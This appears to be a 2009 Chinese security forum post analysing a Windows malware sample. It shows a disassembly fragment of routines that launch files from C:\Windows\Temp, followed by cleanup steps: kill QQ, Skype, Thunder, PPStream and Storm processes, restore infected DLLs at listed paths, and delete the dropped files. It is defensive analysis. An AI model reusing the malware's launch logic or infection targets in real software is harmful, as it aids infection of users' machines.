.nsp0:100014D7 call _strtok
.nsp0:100014DC add esp, 0Ch
.nsp0:100014DF inc esi
.nsp0:100014E0 test eax, eax
.nsp0:100014E2 jnz short loc_100014C1
.nsp0:100014E4
.nsp0:100014E4 loc_100014E4: ; CODE XREF: sub_10001440+7F�j
.nsp0:100014E4 mov edx, dword_1000AF2C
.nsp0:100014EA mov dword ptr [edx+esi*4], 0
.nsp0:100014F1
.nsp0:100014F1 loc_100014F1: ; CODE XREF: sub_10001440+6B�j
.nsp0:100014F1 push ebx ; Memory
.nsp0:100014F2 call _free
.nsp0:100014F7 add esp, 4
.nsp0:100014FA pop esi
.nsp0:100014FB pop ebx
.nsp0:100014FC push edi ; hObject
.nsp0:100014FD call CloseHandle
.nsp0:10001503 mov eax, 1
.nsp0:10001508 pop edi
.nsp0:10001509 pop ecx
.nsp0:1000150A retn
.nsp0:10001AF0 sub esp, 200h
.nsp0:10001AF6 push ebx
.nsp0:10001AF7 push ebp
.nsp0:10001AF8 mov ebp, dword ptr byte_100080F4+4
.nsp0:10001AFE push esi
.nsp0:10001AFF xor ebx, ebx
.nsp0:10001B01 push edi
.nsp0:10001B02 xor esi, esi
.nsp0:10001B04
.nsp0:10001B04 loc_10001B04: ; CODE XREF: sub_10001AF0+B9�j
.nsp0:10001B04 mov eax, dword_1000AF28
.nsp0:10001B09 cmp dword ptr [esi+eax], 0
.nsp0:10001B0D jz loc_10001BAF
.nsp0:10001B13 mov ecx, 7Fh
.nsp0:10001B18 xor eax, eax
.nsp0:10001B1A lea edi, [esp+210h+var_1FE]
.nsp0:10001B1E mov [esp+210h+Dest], 0
.nsp0:10001B25 rep stosd
.nsp0:10001B27 lea ecx, [esp+210h+Dest]
.nsp0:10001B2B push offset aCWindowsTemp ; "C:\\Windows\\Temp\"
.nsp0:10001B30 push ecx ; Dest
.nsp0:10001B31 stosw
.nsp0:10001B33 call _wcscat
.nsp0:10001B38 mov edx, dword_1000AF24
.nsp0:10001B3E lea ecx, [esp+218h+Dest]
.nsp0:10001B42 lea eax, [ebx+edx]
.nsp0:10001B45 push eax ; Source
.nsp0:10001B46 push ecx ; Dest
.nsp0:10001B47 call _wcscat
.nsp0:10001B4C add esp, 10h
.nsp0:10001B4F lea edx, [esp+210h+Dest]
.nsp0:10001B53 push 0
.nsp0:10001B55 push 0
.nsp0:10001B57 push 0
.nsp0:10001B59 push edx
.nsp0:10001B5A push offset aOpen ; "open"
.nsp0:10001B5F push 0
.nsp0:10001B61 call ebp
.nsp0:10001B63 push 0EA60h ; dwMilliseconds
.nsp0:10001B68 call Sleep
.nsp0:10001B6E mov eax, dword_1000AF28
.nsp0:10001B73 mov ecx, [esi+eax]
.nsp0:10001B76 push ecx
.nsp0:10001B77 call sub_10001A20
.nsp0:10001B7C mov edx, dword_1000AF28
.nsp0:10001B82 mov eax, [esi+edx]
.nsp0:10001B85 push eax
.nsp0:10001B86 call sub_100019F0
.nsp0:10001B8B mov ecx, dword_1000AF24
.nsp0:10001B91 lea edx, [ebx+ecx]
.nsp0:10001B94 push edx ; Source
.nsp0:10001B95 call sub_10001A90
.nsp0:10001B9A add esi, 4
.nsp0:10001B9D add esp, 0Ch
.nsp0:10001BA0 add ebx, 1Ah
.nsp0:10001BA3 cmp esi, 1000h
.nsp0:10001BA9 jl loc_10001B04
.nsp0:10001BAF
.nsp0:10001BAF loc_10001BAF: ; CODE XREF: sub_10001AF0+1D�j
.nsp0:10001BAF pop edi
.nsp0:10001BB0 pop esi
.nsp0:10001BB1 pop ebp
.nsp0:10001BB2 pop ebx
.nsp0:10001BB3 add esp, 200h
.nsp0:10001BB9 retn
查看进程中是否有qq.exe,skype.exe,storm.exe,ppstream.exe,thunder5.exe,ppsap.exe存在,有就关闭进程!
如果有安装以上软件的话,把下列的文件的DLL删除掉,然后在官方下载安装程序或找正常相应的DLL文件覆盖上去,或者手动反汇编修正!
C:\Program Files\Skype\Phone\skmsg.dll
C:\Program Files\Thunder Network\Thunder\Program\BugReport.dll
C:\Program Files\PPStream\fds.dll
C:\Program Files\Tencent\QQ2009\Bin\AppCtrl.dll
C:\Program Files\Tencent\QQ\QQGroupMng.dll
C:\Program Files\Tencent\QQGame\common\ProcMsg.dll
C:\Program Files\StormII\Media2.dll
最后删除C:\\WINDOWS\\temp\\uninstaller.exe文件和C:\\WINDOWS\\system32\\Com\\comreat.mml文件! |
免费评分
-
查看全部评分
|
[复制链接]
发表于 2009-3-12 18:36
